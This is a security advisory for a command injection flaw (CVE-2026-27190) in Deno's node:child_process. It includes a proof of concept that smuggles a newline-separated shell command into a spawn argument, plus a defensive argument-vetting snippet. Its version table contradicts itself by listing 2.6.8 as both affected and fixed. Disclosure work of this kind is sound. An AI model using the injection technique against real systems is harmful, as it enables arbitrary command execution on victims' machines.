8.1
Deno's Node Child Process Feature Allows Malicious Commands
CVE-2026-27190
GHSA-hmh4-3xvx-q5hr
Summary
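Deno's `node:child_process` implementation has a command injection vulnerability caused by an incomplete shell metacharacter blocklist. When a child process is spawned with `shell: true`, an argument containing a newline can cause additional commands to run, so an attacker who controls an argument can execute arbitrary commands on your system. This is a serious issue because it can lead to data theft or system compromise. To fix this, update to Deno version 2.6.8 as soon as possible.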
What to do
- Update deno to version 2.6.8.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | deno | <= 2.6.8 | 2.6.8 |
| deno | deno | <= 2.6.8 | – |
Original title
Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process
Original description
## Summary
A command injection vulnerability exists in Deno's `node:child_process` implementation.
## Reproduction
```javascript
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
  shell: true,
  encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
```
Run: `deno run --allow-all poc.mjs`
The file `/tmp/rce_proof` is created, confirming arbitrary command execution.
## Mitigation
All users need to update to the patched version (Deno v2.6.8).
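A caller-side check that complements the upgrade, as an added example (not code from the Deno project or the advisory): each argument is vetted against an allowlist and `shell: false` is forced before the values reach `spawnSync`. The names `classifyArg` and `planSpawn`, the allowlist itself, and the sample inputs are assumptions made for illustration.

```javascript
// Added example: argument vetting for child processes (names are illustrative).
// Allowlist of characters that carry no special meaning to a POSIX shell.
const SAFE_ARG = /^[A-Za-z0-9_@%+=:,.\/-]+$/;

// Classify one argument; the reason explains why it was rejected.
function classifyArg(arg) {
  if (typeof arg !== "string") return { ok: false, reason: "not a string" };
  if (arg.length === 0) return { ok: false, reason: "empty" };
  if (/[\r\n]/.test(arg)) return { ok: false, reason: "line break" };
  if (/[\x00-\x1f\x7f]/.test(arg)) return { ok: false, reason: "control character" };
  if (!SAFE_ARG.test(arg)) return { ok: false, reason: "outside allowlist" };
  return { ok: true, reason: null };
}

// Build the (command, args, options) triple to hand to spawnSync.
// Throws on any rejected argument and always disables the shell.
function planSpawn(command, args, options = {}) {
  const rejected = args
    .map((arg, index) => ({ index, ...classifyArg(arg) }))
    .filter((r) => !r.ok);
  if (rejected.length > 0) {
    const detail = rejected.map((r) => `args[${r.index}]: ${r.reason}`).join("; ");
    throw new Error(`refusing to spawn: ${detail}`);
  }
  return { command, args: [...args], options: { ...options, shell: false } };
}

// Constructed inputs: the advisory's newline payload and a benign path.
const hostile = "/tmp/legitimate.ts\ntouch /tmp/rce_proof";
const benign = "/tmp/legitimate.ts";

function demo() {
  let blocked = null;
  try {
    planSpawn("deno", ["run", hostile], { shell: true });
  } catch (err) {
    blocked = err.message;
  }
  const plan = planSpawn("deno", ["run", benign], { shell: true, encoding: "utf-8" });
  return { blocked, plan };
}

console.log(demo());
// Usage: const p = planSpawn(Deno.execPath(), ["run", userPath]);
//        spawnSync(p.command, p.args, p.options);
```

The allowlist is deliberately strict, so paths containing spaces or other punctuation are rejected; widen it only for characters you have confirmed are safe in your deployment.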
nvd CVSS3.1
9.8
Vulnerability type
CWE-78
OS Command Injection
- https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c Patch
- https://github.com/denoland/deno/releases/tag/v2.6.8 Product Release Notes
- https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr Exploit Vendor Advisory
- https://nvd.nist.gov/vuln/detail/CVE-2026-27190
- https://github.com/advisories/GHSA-hmh4-3xvx-q5hr
Published: 19 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026